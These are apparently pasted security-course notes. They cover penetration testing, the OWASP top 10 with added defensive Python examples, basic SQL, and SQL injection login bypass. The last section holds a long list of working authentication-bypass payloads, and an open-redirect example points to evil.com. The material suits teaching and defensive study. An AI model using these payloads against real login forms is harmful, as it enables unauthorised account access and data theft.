session 9

a guest
Apr 26th, 2019
VAPT
Vulnerability Assessment and Penetration Testing
VAPT EXPERT = Vulnerability Assessment and Penetration Testing expert

So VULNERABILITY ASSESSMENT is a pre-hacking phase in which the intended person scans the target and tries to find the security gaps or holes that make the device or software vulnerable.

Example
ip address -> 192.168.1.55
open ports (ports on which some application may be listening)
Filtered ports (firewall protected)
OS information - is it up to date?
Services running on the ports


PENETRATION TESTING is a phase in which the intended person actually tests the systems by simulating attacks on them.

Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack like a malicious hacker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and involves active exploitation of security vulnerabilities.

Example: using exploits for a known vulnerability

-> Windows 7 server

-> Using an exploit to exploit the server

At the end a proof of concept needs to be made and handed to the senior authority.

Example
Big banks or smart car manufacturers hire security professionals to hack into their systems ethically and pay them large sums of money to do that. At the end of the VAPT, a VAPT report needs to be handed to the bank's security team.

__________________________________________________



OWASP -> Open Web Application Security Project

OWASP top 10

1. Injection
2. Broken Authentication and Session Management
3. Cross Site Scripting (XSS)
4. Insecure Direct Object Reference
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross Site Request Forgery
9. Using Known Vulnerable Components
10. Unvalidated Redirects and Forwards



1. Injection Vulnerabilities --> SQL, commands

An injection attack occurs only if hackers are able to send malicious, unintended data from the application to the interpreter, i.e. the backend of the website.

application -> untrusted data -> interpreter (backend)

Why this attack occurs ->>
This attack occurs because of improper validation. For example, take the sign-in or sign-up field of a web application: when a user tries to sign in or sign up, the app requires the user to enter the id/password in a certain format, e.g. no special characters allowed. You will learn about that as regular expressions.

Similarly, when a developer sets up a web app or application, he/she needs to validate all the parameters, links and domains of the website so that commands or special characters do not work.
__________________________________________________________________
2. Broken Authentication and Session Management

In broken authentication or session management, hackers attempt to steal accounts from other users. Attackers use leaks and flaws in the authentication or session management functions.

Why this attack occurs....

-> User credentials are not protected using hashing or encryption when stored
-> Credentials can be guessed or overwritten through weak account management functions (e.g. the hacker is able to guess a session id, or change the password)

-> Session ids are exposed in the URL
-> Session ids don't time out
______________________________________________________________________

3. Cross Site Scripting (XSS)

It is an attack in which hackers are able to execute JavaScript code on a web site. It is of three types:

-> Reflected XSS

-> Stored XSS

-> DOM XSS

This attack can be used by a hacker to execute JavaScript code in the victim's browser to hijack user sessions, deface the website, insert content, etc.

Why this attack occurs

-> Improper validation
-> Unsafe JavaScript APIs

Pentesting a website can easily protect it from XSS attacks, and XSS can also be found with simple code analysis.
_______________________________________________________________________________

4. Insecure Direct Object Reference


It is a vulnerability in which an attacker who is authorised to access his/her own dashboard is able to gain access to some other user's account by changing the object reference assigned to him/her by the app.

study tonight

5. Security Misconfiguration

As the name says, security misconfiguration: imagine a web app having admin accounts on it, or just default accounts with default passwords but with certain privileges. Now if you run a website which has default accounts configured and your website is available on the public internet, then from an attacker's perspective he/she can go out, try the default credentials and log in to the website.

Why this attack occurs ->

-> Keeping default credentials
-> Using a component or plugin which may have some default credentials
e.g.
-> Directory listing is not disabled on your server.

Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she decompiles and reverse engineers to get all your custom code. She then finds a serious access control flaw in your application.
_______________________________________________________________________

6. Sensitive Data Exposure
Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion, at rest, or even in the customer's/user's browser.


e.g. 1
An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.

e.g. 2
A site simply doesn't use SSL for all authenticated pages. Attacker simply monitors network traffic (like an open wireless network), and steals the user's session cookie. Attacker then replays this cookie and hijacks the user's session, accessing the user's private data.


_____________________________________________________________________________
7. Missing Function Level Access Control
-> It is an attack in which a hacker or an anonymous person is able to access an application interface that they would otherwise never have been able to access.

e.g. www.anywebsite.com/user

and the hacker is able to access www.anywebsite.com/admin
Now if a hacker/person is able to do that, it is a flaw.
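The server-side check that both 4 (Insecure Direct Object Reference) and 7 (Missing Function Level Access Control) are missing, as an added example that is not part of the original notes. The user ids reuse the Member table from these notes; the admin account, the USERS/ROUTE_ROLES tables and the authorize function are assumptions for illustration.

```python
# Constructed sample users, reusing the ids from the Member table in these notes.
USERS = {
    10: {"name": "deepak", "role": "user"},
    4:  {"name": "Gagan",  "role": "user"},
    1:  {"name": "admin",  "role": "admin"},   # hypothetical admin account
}

# Which role each function (URL path) requires. Checking this on the server,
# for every request, is what "missing function level access control" leaves out.
ROUTE_ROLES = {
    "/user":  {"user", "admin"},
    "/admin": {"admin"},
}

def authorize(session_user_id, path, requested_user_id=None):
    """Return (allowed, reason). First checks the caller's role against the
    function being called, then checks that the object referenced by the
    request (another user's dashboard) actually belongs to the caller."""
    caller = USERS.get(session_user_id)
    if caller is None:
        return (False, "not authenticated")
    allowed_roles = ROUTE_ROLES.get(path)
    if allowed_roles is None or caller["role"] not in allowed_roles:
        return (False, "function not permitted for role " + caller["role"])
    # Direct object reference check: whatever id the request carries, a normal
    # user may only open their own dashboard; an admin may open any.
    if (requested_user_id is not None and requested_user_id != session_user_id
            and caller["role"] != "admin"):
        return (False, "object belongs to another user")
    return (True, "ok")
```

The decisive point is that the server derives the caller's identity from the session, never from the id in the URL.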
____________________________________________________________

8. Cross Site Request Forgery
In this attack the hacker creates a forged HTTP request and tricks the victim into submitting that request via image tags or XSS.



The application allows a user to submit a state-changing request that does not include anything secret.
For example:
http://anywebsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243
This is all done by making the victim click on a link or on a certain appealing image.
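How the transferFunds request above is protected once it carries something secret: a per-session anti-CSRF token that the forged link cannot contain. Added example, not from the original notes; the in-memory BALANCES table, the Session class and transfer_funds are assumptions for illustration.

```python
import hmac
import secrets

# Constructed in-memory bank for the transferFunds example in these notes.
BALANCES = {"victim": 5000, "4673243243": 0}

class Session:
    """A logged-in user's server-side session. The CSRF token is a random
    per-session secret that only the site's own forms can include."""
    def __init__(self, account):
        self.account = account
        self.csrf_token = secrets.token_urlsafe(32)

def transfer_funds(session, params, form_token=None):
    """Handle /app/transferFunds. Returns "ok" or a rejection reason, and only
    changes state when the request carries the token issued to this session."""
    if form_token is None or not hmac.compare_digest(session.csrf_token, form_token):
        return "rejected: missing or wrong csrf token"
    amount = int(params["amount"])
    dest = params["destinationAccount"]
    if amount <= 0 or BALANCES[session.account] < amount:
        return "rejected: invalid amount"
    BALANCES[session.account] -= amount
    BALANCES[dest] = BALANCES.get(dest, 0) + amount
    return "ok"

def demo():
    BALANCES.update({"victim": 5000, "4673243243": 0})
    victim = Session("victim")
    # The query string from the notes, as an attacker would embed it in a link
    # or <img> tag: the victim's browser attaches the cookie, but no token.
    forged = {"amount": "1500", "destinationAccount": "4673243243"}
    r1 = transfer_funds(victim, forged)
    # A token belonging to another session does not work either.
    r2 = transfer_funds(victim, forged, form_token=Session("other").csrf_token)
    # The site's own form carries the right token, so the transfer goes through.
    r3 = transfer_funds(victim, forged, form_token=victim.csrf_token)
    return r1, r2, r3, BALANCES["victim"]
```

Modern browsers add a second layer by not sending cookies marked SameSite on cross-site requests, but the token check is what the server itself can verify.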
_______________________________________________________________



9. Using Components with Known Vulnerabilities
In this case the hacker tries to discover a weak component through scanning or manual analysis, and then either finds an exploit if one is already available or writes an exploit.

e.g.
a website using a server which has an RCE exploit
or
a WordPress website which has a vulnerable component for which an exploit exists.
___________________________________________________________________________________

10. Unvalidated Redirects and Forwards
The attacker links to an unvalidated redirect and tricks the victim into clicking it; the attacker targets unsafe forwards to bypass security checks.

e.g. http://anywebsite.com/redirect.jsp?url=evil.com

->-> url=evil.com <-<-
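Validating the url parameter of redirect.jsp against an allow-list of our own hosts, as an added example that is not part of the original notes. SITE_ROOT, ALLOWED_HOSTS and safe_redirect_target are assumptions for the anywebsite.com example.

```python
from urllib.parse import urljoin, urlparse

# Hypothetical site root and allow-list for the anywebsite.com example.
SITE_ROOT = "http://anywebsite.com/"
ALLOWED_HOSTS = {"anywebsite.com", "www.anywebsite.com"}

def safe_redirect_target(url_param):
    """Validate the ?url= parameter of redirect.jsp. Returns the absolute URL
    the browser may be sent to, or None if the redirect must be refused."""
    if not url_param or not url_param.strip():
        return None
    # Resolve against our own root: "/account" stays on our site, while the
    # scheme-relative "//evil.com" resolves to an external host and is refused.
    target = urljoin(SITE_ROOT, url_param.strip())
    parts = urlparse(target)
    if parts.scheme not in ("http", "https"):
        return None                      # javascript:, data:, file: ...
    host = (parts.hostname or "").lower()
    # hostname ignores userinfo, so "http://anywebsite.com@evil.com/" is seen
    # as evil.com and refused rather than trusted because of the prefix.
    if host not in ALLOWED_HOSTS:
        return None
    return target
```

A bare "evil.com" without a scheme is resolved here as a path on our own host, so the app never builds a cross-site Location header from it.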

______________________________________________________________________________________
Introduction to DBMS
Database

A database is a collection of structured data sets which contains all the data (important credentials, logs, etc.).
Database Management System - this data needs to be managed, and that is done with the help of a DBMS. A DBMS can also interact with the user and write user data to the database.

Databases can be of two types
SQL
NoSQL
There are certain tables and entries in a database

table name: Member
__________________________________________________________________
Name   | ID | NUMBER     | EMAIL              | ADDRESS     | Age |
__________________________________________________________________
deepak | 10 | 9123456719 | deepak@yahoo.co.in | lokhandvala | 26  |
Gagan  | 4  | 9145619237 | gagan@gmail.com    | Delhi       | 20  |
__________________________________________________________________


Structured queries would look like this.
For example: all the people who have age less than 30.
So the query would look like

Select * from Member where age<30


H.W.: perform all queries
queries
= SELECT - extracts data from a database
= UPDATE - updates data in a database
= DELETE - deletes data from a database
= INSERT INTO - inserts new data into a database
= CREATE DATABASE - creates a new database
= ALTER DATABASE - modifies a database
= CREATE TABLE - creates a new table
= ALTER TABLE - modifies a table
= DROP TABLE - deletes a table
= SELECT * from trainees - select everything from the table named "trainees"
= WHERE - filters the rows of the table by a condition on a column

H.W.: study MongoDB
SQL vs NoSQL

_________________________________
LVS Setup configuration Practical
_________________________________

______________________________________________
SQL Injection Authentication Bypass

What is happening at the time of authentication?
Let's imagine
there will be some query -> username == 'Something' && password == 'Something'

If we somehow make the query true and the DBMS gets confused, will it give us a login??

for e.g. username = 1' or '1' = '1
password = 1' or '1' = '1

Or what else can we try
0' or '0' = '0
2' or '2' = '2
or
0' or '3' = '3

So basically you just need to manage to make the query true, and if there is improper validation you can get access.
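Why the inputs above make the query true, and why a parameterised query does not care about them: an added example that is not part of the original notes, using sqlite3. The users table, the admin row and the two login functions are assumptions; passwords are stored in clear only to keep the example short (a real app stores hashes, as noted under 2 above).

```python
import sqlite3

def make_db():
    """Constructed sample users table (not from the notes): the hello/hello1
    user from the example below and a hypothetical admin account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("hello", "hello1"), ("admin", "placeholder-password")])
    return con

def login_vulnerable(con, username, password):
    """Builds the query by string concatenation, so a quote in the input ends
    the string literal and the rest of the input is parsed as SQL.
    Returns the matched username, or None."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(con, username, password):
    """Same check with a parameterised query: the input is bound as data, so
    quotes and comment markers never reach the SQL parser as syntax."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

BYPASS = "1' or '1' = '1"   # payload from the notes: OR '1'='1' is true for every row
COMMENT = "admin' --"       # quote closes the literal, -- comments out the password check

def demo():
    con = make_db()
    return {
        "vuln_valid":   login_vulnerable(con, "hello", "hello1"),
        "vuln_bypass":  login_vulnerable(con, BYPASS, BYPASS),
        "vuln_comment": login_vulnerable(con, COMMENT, "wrong"),
        "safe_valid":   login_safe(con, "hello", "hello1"),
        "safe_bypass":  login_safe(con, BYPASS, BYPASS),
        "safe_comment": login_safe(con, COMMENT, "wrong"),
    }
```

Input validation with regular expressions helps, but the parameterised query is the fix that holds even when validation is missed.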
username = hello
password = hello1

login


username = 1' or '1' = '1
password = 1' or '1' = '1

... WHERE username='1' or '1' = '1' AND password='1' or '1' = '1' ...
1' or '1' = '1
___________________________________________
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055